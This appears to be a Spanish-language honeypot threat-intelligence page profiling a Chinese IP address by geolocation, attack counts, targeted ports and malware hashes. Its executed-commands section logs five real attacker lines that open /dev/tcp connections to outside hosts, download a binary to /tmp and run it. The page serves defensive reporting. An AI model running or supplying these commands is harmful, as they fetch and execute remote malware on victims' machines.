TROYANOSYVIRUS
Amenaza ActivaALTO

117.72.211.165

Pais de Origen🇨🇳 China
Primera Deteccion17/1/2026
Ultima Actividad17/1/2026
ISPChina Telecom Beijing Tianjin Hebei Big Data Industry Park Branch
🎯
191
Ataques Totales
🔌
2
Puertos
📡
2
Tipos Ataque
🦠
5
Malware

Geolocalizacion

Pais
🇨🇳 China
Ciudad
Desconocida
ASN
AS141679
ISP
China Telecom Beijing Tianjin Hebei Big Data Industry Park Branch

Tipos de Ataque

cowrie
redishoneypot

Puertos Atacados

637922

Malware Asociado

2d662c61ab6eca85bf4d...661b3303484bbbdc1dc1...d80a75c39aa684f2878c...82cffbaea77490fe3254...53fde67f225e3db20ea8...

Comandos Ejecutados

$nohup bash -c "exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/YM8YyVKuwM && chmod +x /tmp/YM8YyVKuwM && /tmp/YM8YyVKuwM /CHeurIjsSSOlCG4PaW62TuLjTDfv6s1riKLjT6yOLum1zOHizHevLMtsSaClCGxNKW52DKTiTnVvrs8tCKaiyG3I7y6wTOMjC/evr43tiCLjiPLQaro9yFjGkL4CuMsfGBFQHaDkQ==" &1x
$nohup bash -c "exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/99OT2ffQSW && chmod +x /tmp/99OT2ffQSW && /tmp/99OT2ffQSW i33533+khFcWANx6lTcyL5903R8SVJWyaN/5auT4aPjDfriPVRIf2XqFKDYhi3PcFwxSgrlo2fBn/Pps/N9mu4RUDBnfbJcoMTeUdNgUFFOEvnXWNtL0BOdbQwi2/621k32KEO8SmCog7m1CGRprHC8y" &1x
$nohup bash -c "exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/a9elyMqkMU && chmod +x /tmp/a9elyMqkMU && /tmp/a9elyMqkMU 5s9TREkEQFdVLl1RQgRFSljZl5bbUFJJBENXWy5eU0EESUBY2ZeW21pSQBhISF00WEhAEkFcUNmdkd9TQkYKQFdbLltUXxhAQ0zekZLVVEJAHkIjrbrCqgXzJ0bQKkGCL9uw2EKEKjk=" &1x
$nohup bash -c "exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/Ck3znY73qC && chmod +x /tmp/Ck3znY73qC && /tmp/Ck3znY73qC fxVclpeLzGMy+t0QlnVvnR3a5Dpmz4WXjl8ECRAHWJCBnc9oPeTdE517apcewuU/ZtOUl5BDBwgEA12Rn5LdYzrjwhCXdWmUFsLlPWfHk5+RWQZlTD5Gn1EfIl1f/WMMmcKpRBGLVnDi9DDmU3lbDxM=" &1x
$nohup bash -c "exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/hPVHsxl67Q && chmod +x /tmp/hPVHsxl67Q && /tmp/hPVHsxl67Q B2s5OhpRAZJpK4jj65c3a5wGTxI4P2t7fHMmORJGHpdqNpfv44MzbZcETQMwJnl7fWU6PRNRCJRnM4nq74ElbJcHURQ6Jnl7e2U5PhZFBpZsMYoAuqOpniwuPG492X2mYDgzmh5TvaGr8UoSCg==" &1x

Evaluacion de Riesgo

60
/100
BajoMedioAltoCritico